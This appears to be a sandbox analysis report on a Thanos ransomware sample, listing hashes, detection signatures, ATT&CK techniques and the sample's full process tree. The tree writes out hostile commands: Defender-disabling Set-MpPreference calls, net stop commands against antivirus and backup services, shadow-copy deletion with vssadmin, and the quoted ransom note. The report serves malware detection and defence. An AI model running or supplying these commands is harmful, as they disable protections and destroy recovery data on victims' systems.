thanos | 2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
56s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Size

393KB
MD5

104b68a8b7e2913139049b30847f990f
SHA1

0f25791a039298be94a3d024f5a3d1796e13a587
SHA256

b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424
SHA512

cba38f93247621cc38ea33f72efc1147e0a6d1a8b9256a26853ac3c1c8c3c9444d2d3a5af586e934febad1822c93fbc1e9c538759b4587720ba03a92792ce04d

Score

10^/10

thanos evasion persistence ransomware trojan

Malware Config

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\file.exe	disable_win_def
C:\Users\Admin\AppData\Local\Temp\file.exe	disable_win_def

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Thanos Ransomware
Ransomware-as-a-service (RaaS) sold through underground forums.
ransomware thanos

Thanos executable 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\file.exe	family_thanos_ransomware
C:\Users\Admin\AppData\Local\Temp\file.exe	family_thanos_ransomware

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 1 IoCs

Processes:

file.exe

pid process

4016 file.exe

Modifies extensions of user files 7 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

file.exe

description	ioc	process
File created	C:\Users\Admin\Pictures\DisableClose.tiff.crypted	file.exe
File opened for modification	C:\Users\Admin\Pictures\DisableClose.tiff	file.exe
File created	C:\Users\Admin\Pictures\RenameRemove.tiff.crypted	file.exe
File opened for modification	C:\Users\Admin\Pictures\RenameRemove.tiff	file.exe
File created	C:\Users\Admin\Pictures\StepGroup.tiff.crypted	file.exe
File opened for modification	C:\Users\Admin\Pictures\StepGroup.tiff	file.exe
File created	C:\Users\Admin\Pictures\ConvertToUnregister.png.crypted	file.exe

Drops startup file 1 IoCs

Processes:

file.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk file.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk	file.exe

Enumerates connected drives 3 TTPs 18 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

file.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..."	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n"	file.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
2160	vssadmin.exe
2072	vssadmin.exe
1320	vssadmin.exe
4540	vssadmin.exe
4504	vssadmin.exe
4672	vssadmin.exe
4012	vssadmin.exe
4100	vssadmin.exe
2100	vssadmin.exe
1844	vssadmin.exe
1164	vssadmin.exe
4120	vssadmin.exe
4736	vssadmin.exe
4560	vssadmin.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4312 taskkill.exe
2356 taskkill.exe
4076 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4828 PING.EXE

pid	process
4312	taskkill.exe
2356	taskkill.exe
4076	taskkill.exe

pid	process
4828	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

file.exe

pid	process
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe
4016	file.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

file.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeConhost.exesc.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4016	file.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeIncreaseQuotaPrivilege	1744	powershell.exe
Token: SeSecurityPrivilege	1744	powershell.exe
Token: SeTakeOwnershipPrivilege	1744	powershell.exe
Token: SeLoadDriverPrivilege	1744	powershell.exe
Token: SeSystemProfilePrivilege	1744	powershell.exe
Token: SeSystemtimePrivilege	1744	powershell.exe
Token: SeProfSingleProcessPrivilege	1744	powershell.exe
Token: SeIncBasePriorityPrivilege	1744	powershell.exe
Token: SeCreatePagefilePrivilege	1744	powershell.exe
Token: SeBackupPrivilege	1744	powershell.exe
Token: SeRestorePrivilege	1744	powershell.exe
Token: SeShutdownPrivilege	1744	powershell.exe
Token: SeDebugPrivilege	1744	powershell.exe
Token: SeSystemEnvironmentPrivilege	1744	powershell.exe
Token: SeRemoteShutdownPrivilege	1744	powershell.exe
Token: SeUndockPrivilege	1744	powershell.exe
Token: SeManageVolumePrivilege	1744	powershell.exe
Token: 33	1744	powershell.exe
Token: 34	1744	powershell.exe
Token: 35	1744	powershell.exe
Token: 36	1744	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	3972	powershell.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	4124
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	4292	powershell.exe
Token: SeDebugPrivilege	4392	Conhost.exe
Token: SeIncreaseQuotaPrivilege	1312	powershell.exe
Token: SeSecurityPrivilege	1312	powershell.exe
Token: SeTakeOwnershipPrivilege	1312	powershell.exe
Token: SeLoadDriverPrivilege	1312	powershell.exe
Token: SeSystemProfilePrivilege	1312	powershell.exe
Token: SeSystemtimePrivilege	1312	powershell.exe
Token: SeProfSingleProcessPrivilege	1312	powershell.exe
Token: SeIncBasePriorityPrivilege	1312	powershell.exe
Token: SeCreatePagefilePrivilege	1312	powershell.exe
Token: SeBackupPrivilege	1312	powershell.exe
Token: SeRestorePrivilege	1312	powershell.exe
Token: SeShutdownPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeSystemEnvironmentPrivilege	1312	powershell.exe
Token: SeRemoteShutdownPrivilege	1312	powershell.exe
Token: SeUndockPrivilege	1312	powershell.exe
Token: SeManageVolumePrivilege	1312	powershell.exe
Token: 33	1312	powershell.exe
Token: 34	1312	powershell.exe
Token: 35	1312	powershell.exe
Token: 36	1312	powershell.exe
Token: SeDebugPrivilege	4876	sc.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeIncreaseQuotaPrivilege	1524	powershell.exe
Token: SeSecurityPrivilege	1524	powershell.exe
Token: SeTakeOwnershipPrivilege	1524	powershell.exe
Token: SeLoadDriverPrivilege	1524	powershell.exe
Token: SeSystemProfilePrivilege	1524	powershell.exe
Token: SeSystemtimePrivilege	1524	powershell.exe
Token: SeProfSingleProcessPrivilege	1524	powershell.exe
Token: SeIncBasePriorityPrivilege	1524	powershell.exe
Token: SeCreatePagefilePrivilege	1524	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

file.exe

pid process

4016 file.exe
4016 file.exe
4016 file.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

file.exe

pid process

4016 file.exe
4016 file.exe
4016 file.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exefile.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 3260 wrote to memory of 4016	3260	b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe	file.exe
PID 3260 wrote to memory of 4016	3260	b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe	file.exe
PID 4016 wrote to memory of 1744	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1744	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1524	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1524	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1312	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1312	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 3972	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 3972	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1872	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 1872	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 2860	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 2860	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4124	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4124	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4188	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4188	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4292	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4292	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4392	4016	file.exe	Conhost.exe
PID 4016 wrote to memory of 4392	4016	file.exe	Conhost.exe
PID 4016 wrote to memory of 4876	4016	file.exe	sc.exe
PID 4016 wrote to memory of 4876	4016	file.exe	sc.exe
PID 4016 wrote to memory of 4932	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4932	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4156	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 4156	4016	file.exe	powershell.exe
PID 4016 wrote to memory of 2848	4016	file.exe	net.exe
PID 4016 wrote to memory of 2848	4016	file.exe	net.exe
PID 2848 wrote to memory of 4312	2848	net.exe	taskkill.exe
PID 2848 wrote to memory of 4312	2848	net.exe	taskkill.exe
PID 4016 wrote to memory of 2456	4016	file.exe	net.exe
PID 4016 wrote to memory of 2456	4016	file.exe	net.exe
PID 4016 wrote to memory of 2636	4016	file.exe	net.exe
PID 4016 wrote to memory of 2636	4016	file.exe	net.exe
PID 4016 wrote to memory of 1520	4016	file.exe	net.exe
PID 4016 wrote to memory of 1520	4016	file.exe	net.exe
PID 4016 wrote to memory of 3356	4016	file.exe	net.exe
PID 4016 wrote to memory of 3356	4016	file.exe	net.exe
PID 4016 wrote to memory of 4224	4016	file.exe	net.exe
PID 4016 wrote to memory of 4224	4016	file.exe	net.exe
PID 4016 wrote to memory of 4204	4016	file.exe	net.exe
PID 4016 wrote to memory of 4204	4016	file.exe	net.exe
PID 4016 wrote to memory of 3832	4016	file.exe	net.exe
PID 4016 wrote to memory of 3832	4016	file.exe	net.exe
PID 4016 wrote to memory of 4360	4016	file.exe	net.exe
PID 4016 wrote to memory of 4360	4016	file.exe	net.exe
PID 4016 wrote to memory of 3836	4016	file.exe	net.exe
PID 4016 wrote to memory of 3836	4016	file.exe	net.exe
PID 2456 wrote to memory of 184	2456	net.exe	vssvc.exe
PID 2456 wrote to memory of 184	2456	net.exe	vssvc.exe
PID 4016 wrote to memory of 668	4016	file.exe	net.exe
PID 4016 wrote to memory of 668	4016	file.exe	net.exe
PID 2636 wrote to memory of 188	2636	net.exe	Conhost.exe
PID 2636 wrote to memory of 188	2636	net.exe	Conhost.exe
PID 4016 wrote to memory of 3640	4016	file.exe	net.exe
PID 4016 wrote to memory of 3640	4016	file.exe	net.exe
PID 4016 wrote to memory of 1188	4016	file.exe	net.exe
PID 4016 wrote to memory of 1188	4016	file.exe	net.exe
PID 1520 wrote to memory of 496	1520	net.exe	net1.exe
PID 1520 wrote to memory of 496	1520	net.exe	net1.exe
PID 4016 wrote to memory of 4040	4016	file.exe	net.exe
PID 4016 wrote to memory of 4040	4016	file.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3260
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "file.exe"
  2⤵
  - Executes dropped EXE
  - Modifies extensions of user files
  - Drops startup file
  - Modifies WinLogon
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" Get-MpPreference -verbose
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3972
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
    3⤵
    PID:4124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
    3⤵
    PID:4392
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
    3⤵
    PID:4876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    PID:4156
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop avpsus /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2848
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop avpsus /y
      4⤵
      PID:4312
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop McAfeeDLPAgentService /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
      4⤵
      PID:184
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BMR Boot Service /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BMR Boot Service /y
      4⤵
      PID:496
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop mfewc /y
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfewc /y
      4⤵
      PID:188
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:3356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
      4⤵
      PID:3676
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop ccSetMgr /y
    3⤵
    PID:3832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccSetMgr /y
      4⤵
      PID:4340
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop ccEvtMgr /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ccEvtMgr /y
      4⤵
      PID:4252
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBFCService /y
      4⤵
      PID:4492
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop YooIT /y
    3⤵
    PID:4824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooIT /y
      4⤵
      PID:2172
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop zhudongfangyu /y
    3⤵
    PID:4380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop zhudongfangyu /y
      4⤵
      PID:4192
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop stc_raw_agent /y
    3⤵
    PID:4184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop stc_raw_agent /y
      4⤵
      PID:4244
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VSNAPVSS /y
    3⤵
    PID:3844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VSNAPVSS /y
      4⤵
      PID:4332
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:4820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamDeploymentService /y
      4⤵
      PID:4168
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:4352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:3644
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop YooBackup /y
    3⤵
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop YooBackup /y
      4⤵
      PID:4104
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop veeam /y
    3⤵
    PID:5028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop veeam /y
      4⤵
      PID:5196
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:4152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamNFSSvc /y
      4⤵
      PID:5004
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop PDVFSService /y
    3⤵
    PID:4480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5412
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4852
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:5536
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:4960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5436
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5608
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecDiveciMediaService /y
    3⤵
    PID:4256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
      4⤵
      PID:5600
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:2108
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:4040
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:1188
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop QBIDPService /y
    3⤵
    PID:3640
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:3836
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4360
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop DefWatch /y
    3⤵
    PID:4224
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:5020
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:5836
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:5024
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:5844
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SstpSvc start= disabled
    3⤵
    PID:4316
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
    3⤵
    PID:2220
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4540
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4120
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4504
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4672
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4736
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1844
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1164
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4560
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4100
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4012
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:2160
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:2072
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
    3⤵
    - Interacts with shadow copies
    PID:1320
- - C:\Windows\SYSTEM32\vssadmin.exe
    "vssadmin.exe" Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2100
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopservice.exe /F
    3⤵
    - Kills process with taskkill
    PID:4076
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mydesktopqos.exe /F
    3⤵
    - Kills process with taskkill
    PID:4312
- - C:\Windows\SYSTEM32\taskkill.exe
    "taskkill.exe" /IM mspub.exe /F
    3⤵
    - Kills process with taskkill
    PID:2356
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLWriter start= disabled
    3⤵
    PID:4896
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
    3⤵
    PID:4280
- - C:\Windows\SYSTEM32\sc.exe
    "sc.exe" config SQLTELEMETRY start= disabled
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4876
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:2856
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:2416
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:3840
- - C:\Windows\SYSTEM32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:4804
- - C:\Windows\SYSTEM32\net.exe
